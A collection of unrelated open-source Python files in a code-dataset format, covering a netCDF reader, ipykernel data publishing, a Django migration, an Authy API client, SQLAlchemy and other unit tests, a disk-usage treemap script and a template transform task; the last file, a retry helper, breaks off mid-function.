ie = self.shape[self._Xdim] + (self._ie[i] or 0)
a,b = divmod(I0 - i0, Is)
e = np.clip(ie, I0, Ie)
sres[self._Xdim] = slice(max(-a, 0), (e - I0)//Is)
s[self._Xdim] = slice(max(I0 - i0, b), max(Ie - i0, 0), Is)
if self._Ydim is not None:
j0 = self._j0[i]
je = self.shape[self._Ydim] + (self._je[i] or 0)
a,b = divmod(J0 - j0, Js)
e = np.clip(je, J0, Je)
sres[self._Ydim] = slice(max(-a, 0), (e - J0)//Js)
s[self._Ydim] = slice(max(J0 - j0, b), max(Je - j0, 0), Js)
res[sres] = nc.variables[self._name][s]
return res.reshape(resshape)
def _getfaces(self, ind):
res = []
for f in range(self._nf):
shape = tuple(np.isscalar(d) and d or d[f] for d in self.shape)
a = np.zeros(shape, self.typecode())
res.append(a)
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
fn = self._fn[i]
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[fn][s] = nc.variables[self._name][:]
for f in range(self._nf):
res[f] = res[f][ind]
return res
def face(self, fn):
shape = tuple(np.isscalar(d) and d or d[fn] for d in self.shape)
res = np.zeros(shape, self.typecode())
s = [slice(None) for d in self.shape]
for i,nc in enumerate(self.nc):
if self._fn[i] == fn:
if self._Xdim is not None:
s[self._Xdim] = slice(self._i0[i], self._ie[i])
if self._Ydim is not None:
s[self._Ydim] = slice(self._j0[i], self._je[i])
res[s] = nc.variables[self._name][:]
return res
def mnc_files(fpatt, layout=None):
return MNC(fpatt, layout)
mnc_files.__doc__ = MNC.__doc__
def rdmnc(fpatt, varnames=None, iters=None, slices=Ellipsis, layout=None):
''' Read one or more variables from an mnc file set.
Parameters
----------
fpatt :: glob pattern for netcdf files comprising the set
varnames :: list of variables to read (default all)
iters :: list of iterations (not time) to read
slices :: tuple of slices to read from each variable
(typically given as numpy.s_[...])
Returns a dictionary of arrays.
Example:
S = rdmnc("mnc_*/state.0000000000.*', ['U', 'V'], slices=numpy.s_[..., 10:-10, 10:-10])
u = S['U']
v = S['V']
Can currently read only one file set (i.e., 1 file per tile),
not several files split in time.
Consider using mnc_files for more control (and similar convenience).
The same restriction about multiple files applies, however.
'''
mnc = MNC(fpatt, layout)
if varnames is None:
varnames = mnc.variables.keys()
elif isinstance(varnames, str):
varnames = [varnames]
if iters is not None:
try:
iters[0]
except TypeError:
iters = [iters]
iits = [ mnc.iters.index(it) for it in iters ]
if not isinstance(slices, tuple):
slices = (slices,)
res = {}
for varname in varnames:
var = mnc.variables[varname]
if iters is not None and var.dimensions[0] == 'T':
res[varname] = np.array([var[(iit,)+slices] for iit in iits])
else:
res[varname] = var[slices]
mnc.close()
return res
| altMITgcm/MITgcm66h | utils/python/MITgcmutils/MITgcmutils/mnc.py | Python | mit | 14,112 |
"""Publishing native (typically pickled) objects.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from traitlets.config import Configurable
from ipykernel.inprocess.socket import SocketABC
from traitlets import Instance, Dict, CBytes
from ipykernel.jsonutil import json_clean
from ipykernel.serialize import serialize_object
from jupyter_client.session import Session, extract_header
class ZMQDataPublisher(Configurable):
    topic = CBytes(b'datapub')
session = Instance(Session, allow_none=True)
pub_socket = Instance(SocketABC, allow_none=True)
parent_header = Dict({})
def set_parent(self, parent):
"""Set the parent for outbound messages."""
self.parent_header = extract_header(parent)
def publish_data(self, data):
"""publish a data_message on the IOPub channel
Parameters
----------
data : dict
The data to be published. Think of it as a namespace.
"""
session = self.session
buffers = serialize_object(data,
buffer_threshold=session.buffer_threshold,
item_threshold=session.item_threshold,
)
content = json_clean(dict(keys=list(data.keys())))
session.send(self.pub_socket, 'data_message', content=content,
parent=self.parent_header,
buffers=buffers,
ident=self.topic,
)
def publish_data(data):
"""publish a data_message on the IOPub channel
Parameters
----------
data : dict
The data to be published. Think of it as a namespace.
"""
from ipykernel.zmqshell import ZMQInteractiveShell
ZMQInteractiveShell.instance().data_pub.publish_data(data)
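# --- Illustrative usage sketch (names are hypothetical) -----------------------
# From code running inside an IPython kernel:
#
#     import numpy as np
#     from ipykernel.datapub import publish_data
#     publish_data({'weights': np.arange(10), 'step': 3})
#
# The dict is serialized and sent as a 'data_message' on the IOPub channel,
# where a frontend (e.g. ipyparallel) can collect it.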
| bdh1011/wau | venv/lib/python2.7/site-packages/ipykernel/datapub.py | Python | mit | 1,761 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-03 01:08
from __future__ import unicode_literals
from django.db import migrations, models
from blog.models import Post
def slugify_all_posts(*args):
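    # Re-saving each post lets Post.save() populate the new slug field
    # (assumption: slug generation happens in the model's save() method).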
for post in Post.objects.all():
post.save()
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default='', max_length=100),
),
migrations.RunPython(slugify_all_posts)
]
| nnscr/nnscr.de | blog/migrations/0002_post_slug.py | Python | mit | 608 |
import six
from unittest import TestCase
from dark.reads import Read, Reads
from dark.score import HigherIsBetterScore
from dark.hsp import HSP, LSP
from dark.alignments import (
Alignment, bestAlignment, ReadAlignments, ReadsAlignmentsParams,
ReadsAlignments)
class TestAlignment(TestCase):
"""
Tests for the dark.alignment.Alignment class
"""
def testExpectedAttrs(self):
"""
An alignment must have the expected attributes.
"""
alignment = Alignment(45, 'title')
self.assertEqual('title', alignment.subjectTitle)
self.assertEqual(45, alignment.subjectLength)
def testNoHspsWhenCreated(self):
"""
An alignment must have no HSPs when it is created.
"""
alignment = Alignment(45, 'title')
self.assertEqual(0, len(alignment.hsps))
def testAddHsp(self):
"""
It must be possible to add an HSP to an alignment.
"""
alignment = Alignment(45, 'title')
alignment.addHsp(HSP(3))
self.assertEqual(HSP(3), alignment.hsps[0])
class TestReadAlignments(TestCase):
"""
Tests for the dark.alignment.ReadAlignments class
"""
def testRead(self):
"""
An read alignments must store its read.
"""
read = Read('id', 'ACGT')
readAlignments = ReadAlignments(read)
self.assertEqual(read, readAlignments.read)
def testNoAlignments(self):
"""
An read alignments must be able to have no alignments.
"""
read = Read('id', 'ACGT')
readAlignments = ReadAlignments(read)
self.assertEqual(0, len(readAlignments))
def testAlignments(self):
"""
An read alignments must store its alignments.
"""
read = Read('id', 'ACGT')
alignment1 = Alignment(45, 'title1')
alignment2 = Alignment(55, 'title2')
readAlignments = ReadAlignments(read, [alignment1, alignment2])
self.assertEqual([alignment1, alignment2], readAlignments)
class TestBestAlignmentHSP(TestCase):
"""
Test the L{dark.hits.bestAlignment} function when HSPs are used.
"""
def testOneAlignment(self):
"""
When one alignment is present that alignment must be returned by
bestAlignment.
"""
alignment = Alignment(44, 'Seq 1')
alignment.addHsp(HSP(10))
alignment.addHsp(HSP(9))
alignments = [alignment]
hit = ReadAlignments(Read('id1', 'aaa'), alignments)
best = bestAlignment(hit)
self.assertEqual('Seq 1', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
def testThreeAlignments(self):
"""
When three alignments are present, the one with the highest first HSP
must be returned by bestAlignment.
"""
alignment1 = Alignment(33, 'Seq 1')
alignment1.addHsp(HSP(10))
alignment1.addHsp(HSP(9))
alignment2 = Alignment(44, 'Seq 2')
alignment2.addHsp(HSP(30))
alignment2.addHsp(HSP(29))
alignment3 = Alignment(55, 'Seq 3')
alignment3.addHsp(HSP(20))
alignment3.addHsp(HSP(19))
alignments = [alignment1, alignment2, alignment3]
hit = ReadAlignments(Read('id1', 'aaa'), alignments)
best = bestAlignment(hit)
self.assertEqual('Seq 2', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
class TestBestAlignmentLSP(TestCase):
"""
Test the L{dark.hits.bestAlignment} function when LSPs are used.
"""
def testOneAlignment(self):
"""
When one alignment is present that alignment must be returned by
bestAlignment.
"""
alignment = Alignment(44, 'Seq 1')
alignment.addHsp(LSP(10))
alignment.addHsp(LSP(9))
alignments = [alignment]
readAlignments = ReadAlignments(Read('id0', 'aaa'), alignments)
best = bestAlignment(readAlignments)
self.assertEqual('Seq 1', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
def testThreeAlignments(self):
"""
When three alignments are present, the one with the lowest first HSP
must be returned by bestAlignment.
"""
alignment1 = Alignment(33, 'Seq 1')
alignment1.addHsp(LSP(10))
alignment1.addHsp(LSP(9))
alignment2 = Alignment(44, 'Seq 2')
alignment2.addHsp(LSP(3))
alignment2.addHsp(LSP(2))
alignment3 = Alignment(55, 'Seq 3')
alignment3.addHsp(LSP(20))
alignment3.addHsp(LSP(19))
alignments = [alignment1, alignment2, alignment3]
readAlignments = ReadAlignments(Read('id0', 'aaa'), alignments)
best = bestAlignment(readAlignments)
self.assertEqual('Seq 2', best.subjectTitle)
self.assertEqual(44, best.subjectLength)
class TestReadsAlignmentsParams(TestCase):
"""
Test the L{dark.alignments.ReadsAlignmentsParams} class.
"""
def testExpectedAttrs(self):
"""
A ReadsAlignmentsParams instance must have the expected attributes.
"""
applicationParams = {}
params = ReadsAlignmentsParams('application name', applicationParams,
False, 'Bit score')
self.assertEqual('application name', params.application)
self.assertIs(applicationParams, params.applicationParams)
self.assertFalse(params.subjectIsNucleotides)
self.assertEqual('Bit score', params.scoreTitle)
class TestReadsAlignments(TestCase):
"""
Test the L{dark.alignments.ReadsAlignments} class.
"""
# NOTE: The ReadsAlignments class is a base class for concrete
# implementations, such as BlastReadsAlignments. So it can only be
# tested minimally by itself. For full tests see the
# TestBlastReadsAlignments and TestBlastReadsAlignmentsFiltering
# classes in test/blast/blast_alignments.py
def testExpectedAttrs(self):
"""
A ReadsAlignments instance must have the expected attributes.
"""
reads = Reads()
params = {
'application': 'app name'
}
readsAlignments = ReadsAlignments(reads, params)
self.assertIs(readsAlignments.reads, reads)
self.assertEqual('app name', readsAlignments.params['application'])
self.assertIs(params, readsAlignments.params)
self.assertIs(HigherIsBetterScore, readsAlignments.scoreClass)
def testNotIterable(self):
"""
Iterating an empty ReadsAlignments must result in the empty list.
"""
reads = Reads()
readsAlignments = ReadsAlignments(reads, 'applicationName', None)
self.assertEqual([], list(readsAlignments))
def testGetSubjectSequence(self):
"""
A ReadsAlignments instance will not implement getSubjectSequence.
Subclasses are expected to implement it.
"""
reads = Reads()
readsAlignments = ReadsAlignments(reads, 'applicationName', None)
error = 'getSubjectSequence must be implemented by a subclass'
six.assertRaisesRegex(self, NotImplementedError, error,
readsAlignments.getSubjectSequence, 'title')
| bamueh/dark-matter | test/test_alignments.py | Python | mit | 7,278 |
import requests
import platform
from authy import __version__, AuthyFormatException
from urllib.parse import quote
# import json
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
from django.utils import simplejson as json
class Resource(object):
def __init__(self, api_uri, api_key):
self.api_uri = api_uri
self.api_key = api_key
self.def_headers = self.__default_headers()
def post(self, path, data=None):
return self.request("POST", path, data, {'Content-Type': 'application/json'})
def get(self, path, data=None):
return self.request("GET", path, data)
def put(self, path, data=None):
return self.request("PUT", path, data, {'Content-Type': 'application/json'})
def delete(self, path, data=None):
return self.request("DELETE", path, data)
def request(self, method, path, data=None, req_headers=None):
if data is None:
data = {}
if req_headers is None:
req_headers = {}
url = self.api_uri + path
params = {"api_key": self.api_key}
headers = self.def_headers
headers.update(req_headers)
if method == "GET":
params.update(data)
return requests.request(method, url, headers=headers,
params=params)
else:
return requests.request(method, url, headers=headers,
params=params, data=json.dumps(data))
def __default_headers(self):
return {
'User-Agent': "AuthyPython/{0} ({1}; Python {2})".format(
__version__,
platform.platform(True),
platform.python_version()
)}
class Instance(object):
def __init__(self, resource, response):
self.resource = resource
self.response = response
try:
self.content = self.response.json()
except ValueError:
self.content = self.response.text
def ok(self):
return self.response.status_code == 200
def errors(self):
if self.ok():
return {}
errors = self.content
if(not isinstance(errors, dict)):
errors = {"error": errors}
elif('errors' in errors):
errors = errors['errors']
return errors
def __getitem__(self, key):
return self.content[key]
class Sms(Instance):
def ignored(self):
try:
self.content['ignored']
return True
except KeyError:
return False
class User(Instance):
def __init__(self, resource, response):
super(User, self).__init__(resource, response)
if(isinstance(self.content, dict) and 'user' in self.content):
self.id = self.content['user']['id']
else:
self.id = None
class Users(Resource):
def create(self, email, phone, country_code=1):
data = {
"user": {
"email": email,
"cellphone": phone,
"country_code": country_code
}
}
resp = self.post("/protected/json/users/new", data)
return User(self, resp)
def request_sms(self, user_id, options={}):
resp = self.get("/protected/json/sms/"+quote(str(user_id)), options)
return Sms(self, resp)
def status(self, user_id):
resp = self.get("/protected/json/users/{0}/status".format(user_id))
return User(self, resp)
def delete(self, user_id):
resp = self.post("/protected/json/users/{0}/delete".format(user_id))
return User(self, resp)
class Token(Instance):
def ok(self):
if super(Token, self).ok():
return '"token":"is valid"' in str(self.response.content)
return False
class Tokens(Resource):
def verify(self, device_id, token, options={}):
self.__validate(token, device_id)
if 'force' not in options:
options['force'] = "true"
url = "/protected/json/verify/"
url += quote(str(token))+"/"+quote(str(device_id))
resp = self.get(url, options)
return Token(self, resp)
def __validate(self, token, device_id):
self.__validate_digit(token, "Invalid Token. Only digits accepted.")
self.__validate_digit(device_id,
"Invalid Authy id. Only digits accepted.")
length = len(str(token))
if length < 6 or length > 10:
raise AuthyFormatException("Invalid Token. Unexpected length.")
def __validate_digit(self, var, message):
# PEP 0237: Essentially, long renamed to int.
if not isinstance(var, int) and not var.isdigit():
raise AuthyFormatException(message)
class App(Instance):
pass
class Apps(Resource):
def fetch(self):
resp = self.get("/protected/json/app/details")
return App(self, resp)
class Stats(Instance):
pass
class StatsResource(Resource):
def fetch(self):
resp = self.get("/protected/json/app/stats")
return Stats(self, resp)
class Phone(Instance):
pass
class Phones(Resource):
    def verification_start(self, phone_number, country_code, via='sms'):
options = {
'phone_number': phone_number,
'country_code': country_code,
'via': via
}
resp = self.post("/protected/json/phones/verification/start", options)
return Phone(self, resp)
def verification_check(self, phone_number, country_code, verification_code):
options = {
'phone_number': phone_number,
'country_code': country_code,
'verification_code': verification_code
}
resp = self.get("/protected/json/phones/verification/check", options)
return Phone(self, resp)
def info(self, phone_number, country_code):
options = {
'phone_number': phone_number,
'country_code': country_code
}
resp = self.get("/protected/json/phones/info", options)
return Phone(self, resp)
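# --- Illustrative usage sketch (not part of the library) ----------------------
# Endpoint and key below are placeholders; production code normally goes
# through AuthyApiClient, which wires these resources together.
#
#     users = Users("https://api.authy.com", "<api-key>")
#     user = users.create("user@example.com", "555-0100", country_code=1)
#     if user.ok():
#         tokens = Tokens("https://api.authy.com", "<api-key>")
#         check = tokens.verify(user.id, "0000000")
#         print(check.ok(), check.errors())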
| smontoya/authy-python3 | authy/api/resources.py | Python | mit | 6,164 |
import datetime
import MySQLdb
import sys
class DBLogger:
def __init__(self, loc='default-location'):
self.usr = '<user>'
self.pwd = '<password>'
self.dbase = '<database>'
self.location = loc
self.conn = MySQLdb.connect(host="localhost", user=self.usr, passwd=self.pwd, db=self.dbase)
self.cursor = self.conn.cursor()
def cleanUp(self):
        self.cursor.close()
        self.conn.close()
| georgetown-analytics/classroom-occupancy | SensorDataCollection/Sensors/DBLogger.py | Python | mit | 421 |
from unittest.mock import Mock
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy.orm import query
from sqlalchemy.orm import relationship
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import assert_warns_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import mock
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class ScopedSessionTest(fixtures.MappedTest):
@classmethod
def define_tables(cls, metadata):
Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("someid", None, ForeignKey("table1.id")),
)
def test_basic(self):
table2, table1 = self.tables.table2, self.tables.table1
Session = scoped_session(sa.orm.sessionmaker(testing.db))
class CustomQuery(query.Query):
pass
class SomeObject(fixtures.ComparableEntity):
query = Session.query_property()
class SomeOtherObject(fixtures.ComparableEntity):
query = Session.query_property()
custom_query = Session.query_property(query_cls=CustomQuery)
self.mapper_registry.map_imperatively(
SomeObject,
table1,
properties={"options": relationship(SomeOtherObject)},
)
self.mapper_registry.map_imperatively(SomeOtherObject, table2)
s = SomeObject(id=1, data="hello")
sso = SomeOtherObject()
s.options.append(sso)
Session.add(s)
Session.commit()
Session.refresh(sso)
Session.remove()
eq_(
SomeObject(
id=1, data="hello", options=[SomeOtherObject(someid=1)]
),
Session.query(SomeObject).one(),
)
eq_(
SomeObject(
id=1, data="hello", options=[SomeOtherObject(someid=1)]
),
SomeObject.query.one(),
)
eq_(
SomeOtherObject(someid=1),
SomeOtherObject.query.filter(
SomeOtherObject.someid == sso.someid
).one(),
)
assert isinstance(SomeOtherObject.query, query.Query)
assert not isinstance(SomeOtherObject.query, CustomQuery)
assert isinstance(SomeOtherObject.custom_query, query.Query)
def test_config_errors(self):
Session = scoped_session(sa.orm.sessionmaker())
s = Session() # noqa
assert_raises_message(
sa.exc.InvalidRequestError,
"Scoped session is already present",
Session,
bind=testing.db,
)
assert_warns_message(
sa.exc.SAWarning,
"At least one scoped session is already present. ",
Session.configure,
bind=testing.db,
)
def test_call_with_kwargs(self):
mock_scope_func = Mock()
SessionMaker = sa.orm.sessionmaker()
Session = scoped_session(sa.orm.sessionmaker(), mock_scope_func)
s0 = SessionMaker()
assert s0.autoflush == True
mock_scope_func.return_value = 0
s1 = Session()
assert s1.autoflush == True
assert_raises_message(
sa.exc.InvalidRequestError,
"Scoped session is already present",
Session,
autoflush=False,
)
mock_scope_func.return_value = 1
s2 = Session(autoflush=False)
assert s2.autoflush == False
def test_methods_etc(self):
mock_session = Mock()
mock_session.bind = "the bind"
sess = scoped_session(lambda: mock_session)
sess.add("add")
sess.delete("delete")
sess.get("Cls", 5)
eq_(sess.bind, "the bind")
eq_(
mock_session.mock_calls,
[
mock.call.add("add", _warn=True),
mock.call.delete("delete"),
mock.call.get(
"Cls",
5,
options=None,
populate_existing=False,
with_for_update=None,
identity_token=None,
execution_options=None,
),
],
)
with mock.patch(
"sqlalchemy.orm.session.object_session"
) as mock_object_session:
sess.object_session("foo")
eq_(mock_object_session.mock_calls, [mock.call("foo")])
@testing.combinations(
"style1",
"style2",
"style3",
"style4",
)
def test_get_bind_custom_session_subclass(self, style):
"""test #6285"""
class MySession(Session):
if style == "style1":
def get_bind(self, mapper=None, **kwargs):
return super().get_bind(mapper=mapper, **kwargs)
elif style == "style2":
# this was the workaround for #6285, ensure it continues
# working as well
def get_bind(self, mapper=None, *args, **kwargs):
return super().get_bind(mapper, *args, **kwargs)
elif style == "style3":
# py2k style
def get_bind(self, mapper=None, *args, **kwargs):
return super(MySession, self).get_bind(
mapper, *args, **kwargs
)
elif style == "style4":
# py2k style
def get_bind(self, mapper=None, **kwargs):
return super(MySession, self).get_bind(
mapper=mapper, **kwargs
)
s1 = MySession(testing.db)
is_(s1.get_bind(), testing.db)
ss = scoped_session(sessionmaker(testing.db, class_=MySession))
is_(ss.get_bind(), testing.db)
def test_attributes(self):
expected = [
name
for cls in Session.mro()
for name in vars(cls)
if not name.startswith("_")
]
ignore_list = {
"connection_callable",
"transaction",
"in_transaction",
"in_nested_transaction",
"get_transaction",
"get_nested_transaction",
"prepare",
"invalidate",
"bind_mapper",
"bind_table",
"enable_relationship_loading",
"dispatch",
}
SM = scoped_session(sa.orm.sessionmaker(testing.db))
missing = [
name
for name in expected
if not hasattr(SM, name) and name not in ignore_list
]
eq_(missing, [])
| sqlalchemy/sqlalchemy | test/orm/test_scoping.py | Python | mit | 7,276 |
#!/usr/bin/env python
'''
Creates an html treemap of disk usage, using the Google Charts API
'''
import json
import os
import sys
def memoize(fn):
stored_results = {}
def memoized(*args):
try:
return stored_results[args]
except KeyError:
result = stored_results[args] = fn(*args)
return result
return memoized
@memoize
def get_folder_size(folder):
total_size = os.path.getsize(folder)
for item in os.listdir(folder):
itempath = os.path.join(folder, item)
if os.path.isfile(itempath):
total_size += os.path.getsize(itempath)
elif os.path.isdir(itempath):
total_size += get_folder_size(itempath)
return total_size
def usage_iter(root):
root = os.path.abspath(root)
root_size = get_folder_size(root)
root_string = "{0}\n{1}".format(root, root_size)
yield [root_string, None, root_size]
for parent, dirs, files in os.walk(root):
for dirname in dirs:
fullpath = os.path.join(parent, dirname)
try:
this_size = get_folder_size(fullpath)
parent_size = get_folder_size(parent)
this_string = "{0}\n{1}".format(fullpath, this_size)
parent_string = "{0}\n{1}".format(parent, parent_size)
yield [this_string, parent_string, this_size]
except OSError:
continue
def json_usage(root):
root = os.path.abspath(root)
result = [['Path', 'Parent', 'Usage']]
result.extend(entry for entry in usage_iter(root))
return json.dumps(result)
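# Illustrative shape of the JSON produced above (paths and sizes are made up);
# each row is [label, parent label, size], the input format expected by
# google.visualization.arrayToDataTable in the template below:
#
#   [["Path", "Parent", "Usage"],
#    ["/tmp/demo\n4096", null, 4096],
#    ["/tmp/demo/sub\n1024", "/tmp/demo\n4096", 1024]]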
def main(args):
    '''Populates an HTML template with JSON-formatted disk-usage data
    gathered by walking the directory tree, and prints the result'''
html = '''
<html>
<head>
<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script type="text/javascript">
google.load("visualization", "1", {packages:["treemap"]});
google.setOnLoadCallback(drawChart);
function drawChart() {
// Create and populate the data table.
var data = google.visualization.arrayToDataTable(%s);
// Create and draw the visualization.
var tree = new google.visualization.TreeMap(document.getElementById('chart_div'));
tree.draw(data, { headerHeight: 15, fontColor: 'black' });
}
</script>
</head>
<body>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
<p style="text-align: center">Click to descend. Right-click to ascend.</p>
</body>
</html>
''' % json_usage(args[0])
# ''' % du2json(get_usage(args[0]))
    print(html)
if __name__ == "__main__":
main(sys.argv[1:] or ['.'])
| geekoftheweek/disk-treemap | treemap.py | Python | mit | 2,734 |
""" Check what the `lambdax` module publicly exposes. """
import builtins
from inspect import isbuiltin, ismodule, isclass
from itertools import chain
import operator
from unittest.mock import patch
import lambdax.builtins_as_lambdas
import lambdax.builtins_overridden
from lambdax import x1, x2, x
def _get_exposed(tested_module):
return {name for name, obj in vars(tested_module).items()
if not name.startswith('_') and not ismodule(obj)}
def test_no_builtin_exposed():
for obj in chain(vars(lambdax).values(), vars(lambdax.builtins_overridden).values()):
assert not isbuiltin(obj)
def test_base_exposed():
variables = {'x'} | {'x%d' % i for i in range(1, 10)}
variables |= {v.upper() for v in variables}
special_functions = {'λ', 'is_λ', 'comp', 'circle', 'chaining', 'and_', 'or_', 'if_'}
to_expose = variables | special_functions
exposed = _get_exposed(lambdax.lambda_calculus)
assert to_expose == exposed
def test_operators_exposed():
operators = {name for name, obj in vars(operator).items()
if not name.startswith('_') and not isclass(obj) and not hasattr(builtins, name)}
to_expose = operators.difference(('and_', 'or_', 'xor'))
assert to_expose == _get_exposed(lambdax.operators)
def test_overridden_builtins_exposed():
builtin_names = {name for name, obj in vars(builtins).items()
if name[0].upper() != name[0]}
irrelevant_builtins = {
'input', 'help', 'open',
'copyright', 'license', 'credits',
'compile', 'eval', 'exec', 'execfile', 'runfile',
'classmethod', 'staticmethod', 'property',
'object', 'super',
'globals', 'locals'
}
builtins_to_expose = builtin_names - irrelevant_builtins
to_expose_as_λ = {name + '_λ' for name in builtins_to_expose}
split_exposed_names = (name.split('_') for name in _get_exposed(lambdax.builtins_as_lambdas))
exposed_as_λ = {'%s_%s' % (words[0], words[-1]) for words in split_exposed_names}
assert to_expose_as_λ == exposed_as_λ
assert builtins_to_expose == _get_exposed(lambdax.builtins_overridden)
def test_operators_implementations():
operators = vars(operator)
for name, abstraction in vars(lambdax.operators).items():
initial = operators.get(name)
if initial and isbuiltin(initial):
wrapped = getattr(abstraction, '_λ_constant')
assert wrapped == initial
try:
ref = initial(42, 51)
except TypeError as e:
ref = e.args
try:
res = abstraction(x1, x2)(42, 51)
except TypeError as e:
res = e.args
assert res == ref
def _get_effect(implementation):
output = []
with patch('sys.stdout') as out:
out.side_effect = output.append
try:
res = implementation("42")
except BaseException as e:
res = e.args
return res, output
def _get_method_or_object(obj, meth=''):
return getattr(obj, meth) if meth else obj
def test_overridden_builtins_implementations():
for name in _get_exposed(lambdax.builtins_as_lambdas):
obj, tail = name.split('_', 1)
meth = tail[:-2]
original = _get_method_or_object(getattr(builtins, obj), meth)
as_λ = getattr(lambdax.builtins_as_lambdas, name)
overridden = _get_method_or_object(getattr(lambdax.builtins_overridden, obj), meth)
ref, ref_output = _get_effect(original)
expl, expl_output = _get_effect(as_λ(x))
iso, iso_output = _get_effect(overridden)
lbda, lbda_output = _get_effect(overridden(x))
assert lbda_output == iso_output == expl_output == ref_output
try:
assert list(iter(lbda)) == list(iter(iso)) == list(iter(expl)) == list(iter(ref))
except TypeError:
assert lbda == iso == expl == ref
| hlerebours/lambda-calculus | lambdax/test/test_exposed.py | Python | mit | 3,947 |
__author__ = 'ysahn'
import logging
import json
import os
import glob
import collections
from mako.lookup import TemplateLookup
from mako.template import Template
from taskmator.task.core import Task
class TransformTask(Task):
"""
Class that transform a json into code using a template
Uses mako as template engine for transformation
"""
logger = logging.getLogger(__name__)
ATTR_TEMPLATE_DIR = u'template_dir'
ATTR_TEMPLATES = u'templates'
ATTR_SRC_DIR = u'src_dir'
ATTR_SRC_FILES = u'src_files'
ATTR_DEST_DIR = u'dest_dir'
ATTR_FILE_PREFIX = u'file_prefix'
ATTR_FILE_EXT = u'file_ext'
__VALID_ATTRS = [ATTR_TEMPLATE_DIR, ATTR_TEMPLATES, ATTR_SRC_DIR, ATTR_SRC_FILES,
ATTR_DEST_DIR, ATTR_FILE_PREFIX, ATTR_FILE_EXT]
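    # Illustrative attribute values (names follow __VALID_ATTRS above; the paths
    # and template name are made up): template_dir='./templates', templates='model',
    # src_dir='./models', src_files='*.json', dest_dir='./out', file_ext='py'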
def __init__(self, name, parent=None):
"""
Constructor
"""
super(TransformTask, self).__init__(name, parent)
self.template_dir = None
self.templates = collections.OrderedDict()
def setAttribute(self, attrKey, attrVal):
if (attrKey in self.__VALID_ATTRS):
self.attribs[attrKey] = attrVal
else:
super(TransformTask, self).setAttribute(attrKey, attrVal)
def init(self):
super(TransformTask, self).init()
template_dir = self._normalize_dir(self.getAttribute(self.ATTR_TEMPLATE_DIR, './'), './')
template_names = self.getAttribute(self.ATTR_TEMPLATES)
if not template_names:
raise ("Attribute '" + self.ATTR_TEMPLATES + "' is required")
if (isinstance(template_names, basestring)):
template_names = [template_names]
tpl_lookup = TemplateLookup(directories=[template_dir])
for template_name in template_names:
template_paths = glob.glob(template_dir + template_name + '.tpl')
for template_path in template_paths:
atemplate = Template(filename=template_path, lookup=tpl_lookup)
self.templates[template_path] = atemplate
def executeInternal(self, execution_context):
"""
@type execution_context: ExecutionContext
"""
self.logger.info("Executing " + str(self))
src_dir = self._normalize_dir(self.getAttribute(self.ATTR_SRC_DIR, './'), './')
file_patterns = self.getAttribute(self.ATTR_SRC_FILES, '*.json')
file_patterns = file_patterns if file_patterns else '*.json'
# Convert to an array
if (isinstance(file_patterns, basestring)):
file_patterns = [file_patterns]
outputs = {}
for file_pattern in file_patterns:
file_paths = glob.glob(src_dir + file_pattern)
for file_path in file_paths:
model = self._load_model(file_path)
                fname = self._get_filename(file_path, False)
for tpl_path, tpl in self.templates.iteritems():
                    tpl_name = self._get_filename(tpl_path, False)
outputs[fname + '.' + tpl_name] = self._transform(tpl, model, self.getParams())
# write to a file
dest_dir = self._normalize_dir(self.getAttribute(self.ATTR_DEST_DIR, './'), './')
file_ext = '.' + self.getAttribute(self.ATTR_FILE_EXT)
for name, output in outputs.iteritems():
self._write(output, dest_dir + name + file_ext)
return (Task.CODE_OK, outputs)
# Private methods
def _normalize_dir(self, dir, default):
dir = dir if dir else default
dir = dir if dir.startswith('/') else os.getcwd() + '/' + dir
return dir if dir.endswith('/') else dir + '/'
def _load_model(self, model_uri):
file = open(model_uri, "r")
file_content = file.read()
model = json.loads(file_content, object_pairs_hook=collections.OrderedDict)
return model
def _transform(self, thetemplate, model, params):
return thetemplate.render_unicode(model=model, params=params)
    def _get_filename(self, file_path, include_ext=True):
"""
Returns the filename
@param file_path: string The path
@param include_ext: boolean Whether or not to include extension
@return: string
"""
retval = file_path
last_sep_pos = file_path.rfind('/')
if (last_sep_pos > -1):
retval = file_path[last_sep_pos+1:]
if (not include_ext):
last_dot_pos = retval.rfind('.')
if (last_dot_pos > -1):
retval = retval[:last_dot_pos]
return retval
def _write(self, data, dest_path):
self._normalize_dir(dest_path, './')
with open(dest_path, "w") as text_file:
text_file.write(data)
| altenia/taskmator | taskmator/task/text.py | Python | mit | 4,755 |
import sys
import traceback
import logging
import time
import inspect
def run_resilient(function, function_args=[], function_kwargs={}, tolerated_errors=(Exception,), log_prefix='Something failed, tolerating error and retrying: ', retries=5, delay=True, critical=False, initial_delay_time=0.1, delay_multiplier = 2.0):
"""Run the function with function_args and function_kwargs. Warn if it excepts, and retry. If retries are exhausted,
log that, and if it's critical, properly throw the exception """
def show_exception_info(log_prefix):
"""Warn about an exception with a lower priority message, with a text prefix and the error type"""
exc_type, exc_value, exc_traceback = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
traceback_text = lines[2]
logging.info(log_prefix + traceback_text)
return
delay_time = initial_delay_time
while retries:
retries -= 1
try:
return function(*function_args, **function_kwargs)
